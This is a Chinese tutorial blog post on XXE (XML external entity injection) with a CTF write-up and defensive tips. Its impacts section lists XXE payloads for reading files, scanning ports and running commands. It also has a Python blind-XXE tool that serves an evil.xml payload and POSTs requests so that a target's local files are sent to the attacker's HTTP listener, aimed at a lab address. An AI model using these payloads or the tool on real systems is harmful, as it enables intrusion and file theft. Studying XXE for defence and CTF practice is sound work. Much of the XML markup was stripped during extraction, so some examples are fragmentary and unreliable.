热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Xml外部实体注入漏洞

Xml外部实体注入漏洞(XXE)Xml介绍XML不是HTML的替代。XML和HTML为不同的目的而设计:XML被设计为传输和存储数据,其焦点是数据的内容。HTML被设计用来显示数据

Xml外部实体注入漏洞(XXE)

Xml介绍



  • XML 不是 HTML 的替代。



  • XML 和 HTML 为不同的目的而设计:



  • XML 被设计为传输和存储数据,其焦点是数据的内容。



  • HTML 被设计用来显示数据,其焦点是数据的外观。



  • HTML 旨在显示信息,而 XML 旨在传输信息。



XML文档结构包括:XML文档声明,DTD文档类型定义,文档元素.libxml是一个XML文档解释器,libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消失

# xml声明
# DTD文档类型定义

George
John # 文档元素
Reminder
Don't forget the meeting!


内部声明DTD


实体可以通俗的理解为定义变量,实体可在内部或外部进行声明。内部声明就类似直接定义变量,外部声明实体就类似引入外部文件的内容作为变量的值。


内部声明实体






  • 示例




    ]>

    &writer;©right;




外部声明实体






  • 支持http、https、file等很多协议



  • 示例




    ]>

    &writer;©right;




外部声明DTD



  • 外部声明DTD是直接引入外部的一个dtd文件与外部声明实体要区分清楚






  • 示例




    George
    John
    Reminder
    Don't forget the meeting!




漏洞危害



  1. 读取服务器任意文件(file协议导入)




  2. 探测内网端口



    ]>

    在php中可以通过simplexml_load_string函数报错的回显判断端口开放情况,可以通过响应时间来判断(如果目标系统未作处理)



  3. 执行系统命令(需要一定条件 不同语言执行的方式不同)

    安装expect扩展的PHP环境里还可以直接执行系统命令
    执行ifconfig命令


    ]>

    &XXE;



  4. 攻击内网网站(需要内网其他网站存在漏洞)




Buuctf ctf题目


[NCTF2019]Fake XML cookbook


尝试性登录 然后通过burpsuit抓包

Accept: application/xml, text/xml, /; q=0.01

X-Requested-With: XMLHttpRequest

并且post提交的是xml格式的内容-------->可能存在xml外部实体注入漏洞

尝试性注入



]>
&writer;zyh

123456

发现test注入成功---------->判断存在漏洞------->因为是ctf题我们要获取flag--------->读取本地的flag文件

这里读取的文件路径为/flag (因为很多ctf题都会将flag放在这里)


python检测xxe

有回显的xxe很方便就可以判断(比如上面那个ctf题),但是无回显xxe判断起来有些繁琐。这里使用python进行检测,源代码来自《python安全攻防》

from http.server import HTTPServer,SimpleHTTPRequestHandler
import threading
import requests
import sys
# 对原生的log_message函数进行重写,在输出结果的同时把结果保存到文件
class MyHandler(SimpleHTTPRequestHandler):

def log_message(self, format, *args):
# 终端输出HTTP访问信息
sys.stderr.write("%s - - [%s] %s\n" %
(self.client_address[0],
self.log_date_time_string(),
format%args))
# 保存信息到文件
textFile = open("result.txt", "a")
textFile.write("%s - - [%s] %s\n" %
(self.client_address[0],
self.log_date_time_string(),
format%args))
textFile.close()

# 开启HTTP服务,接收数据
def StartHTTP(lip,lport):
# HTTP监听的IP地址和端口
serverAddr = (lip, lport)
httpd = HTTPServer(serverAddr, MyHandler)
print("[*] 正在开启HTTP服务器:\n\n================\nIP地址:{0}\n端口:{1}\n================\n".format(lip, lport))
httpd.serve_forever()
# 创建攻击代码文件
def ExportPayload(lip,lport):
file = open('evil.xml','w')
file.write("\"> %payload;".format(lip, lport))
file.close()
print("[*] Payload文件创建成功!")
#通过POST发送攻击数据
def SendData(lip, lport, url):
# 需要读取的文件的路径(默认值)
filePath = "c:\\test.txt"
while True:
# 对用户的输入的文件路径斜杠的替换
filePath = filePath.replace('\\', "/")
data = "\n\n\n%dtd;\n%send;\n]>".format(filePath, lip, lport)
requests.post(url, data=data)
# 继续接收用户的输入,读取指定文件
filePath = input("Input filePath:")
if __name__ == '__main__':
#本机IP
lip = "192.168.61.130"
#本机HTTP监听端口
lport = 3344
#目标网站提交表单的URL
url = "http://192.168.61.134/xxe-lab/php_xxe/doLogin.php"
# 创建payload文件
ExportPayload(lip, lport)
# HTTP服务线程
threadHTTP = threading.Thread(target=StartHTTP,args=(lip, lport))
threadHTTP.start()
# 发送POST数据线程
threadPOST = threading.Thread(target=SendData,args=(lip, lport, url))
threadPOST.start()

靶场可以选择xxe-lab

对xxe-lab中doLogin.php进行如下操作



  • 注释掉最后一行的echo $result;

  • 增加errer_report(0);

这样不会输出也不会报错 就变成了无回显的xxe漏洞


防御策略



  1. 默认禁止外部实体的解析

  2. 对用户提交的XML数据进行过滤,如关键词
  3. 网站对应的编程语言禁用相关函数



推荐阅读
  • 最近学习了数据挖掘常用的两种算法:FP-Growth和K-Means。现在把我的学习结果分享给大家。以下是本文的目录,大家可以根据需要跳过一些章节:1.FP-Grow ... [详细]
  • hibernate映射组件映射
    在Hibernate中,component是某个实体的逻辑组成部分,它与实体的根本区别是没有oid(对象标识符),compo ... [详细]
  • 最近用python写了一个小程序,想发布出去让人试用又不想暴露源码,搜索了一下发现将py文件编译成pyd文件就能达到目的。转换过程很简单,但是在调用pyd文件并且打包为单个exe文 ... [详细]
  • 第38天:Python decimal 模块
    by程序员野客在我们开发工作中浮点类型的使用还是比较普遍的,对于一些涉及资金金额的计算更是不能有丝毫误差,Python的decimal模块为浮点型精确计算提供了支持。1简介deci ... [详细]
  • windows安装phpstorm百度phpstorm,进入官网:https:www.jetbrains.comphpstorm下载phpstormwindows。如 ... [详细]
  • 开发笔记:python安装出现的证书问题
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了python安装出现的证书问题相关的知识,希望对你有一定的参考价值。1. pipins ... [详细]
  • 根据时间更改网站背景的脚本。热!
    我在网上找到了它,并以自己的方式对其进行了自定义;作者的功劳就在那里。实际上,这是一个用于更改背景颜色的脚本,并且在我看来& ... [详细]
  • 项目为laravel网站上的项目:http://laravelacademy.org/post/2265.html当部署完成后,用浏览器打开首页出现/blognotfou ... [详细]
  • post请求,携带json对象参数模拟获取tokenpublicstaticStringgetToken()throwsIOException{创建连接CloseableHttp ... [详细]
  • 我有二进制格式的数据(十六进制:803bc8870a89),我需要将其转换为字符串,以便通过Jackcess在MSAccess数据库中保存二进制数据.我知道,我不认为在Java中使用 ... [详细]
  • mysql oneproxy稳定吗_Mysql 中间件 oneProxy总结
    建议使用之前把官方的文档全部通读一遍这里提供一个我的网盘地址oneproxy百度网盘0.先对oneproxy有个大概的了解,知道他所处的位置1.MySQL服务器创建t ... [详细]
  • kali激活成功教程软件_kali渗透教程转载请注明出处:https:blog.csdn.netl1028386804articledetails84895163VeilEvasi ... [详细]
  • 利用ipv6技术,废旧笔记本变成server
    如果你家的路由器已经get到了ipv6地址,并且你家的电脑也获取了有效的ipv6地址,在广域网的设备可以访问到。那恭喜你,再配合我这个dd ... [详细]
  • 导读:很多朋友问到关于入门学什么php框架简单的相关问题,本文编程笔记就来为大家做个详细解答,供大家参考,希望对大家有所帮助!一起来看看吧!本文目录一览: ... [详细]
  • 结对编程 地铁最短路径 张波朱新远
    结对编程地铁最短路径一、任务:实现一个帮助进行地铁出行路线规划的命令行程序。PSP2.1PersonalSoftwareProcessStagesTimePlanni ... [详细]
author-avatar
章小胭
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有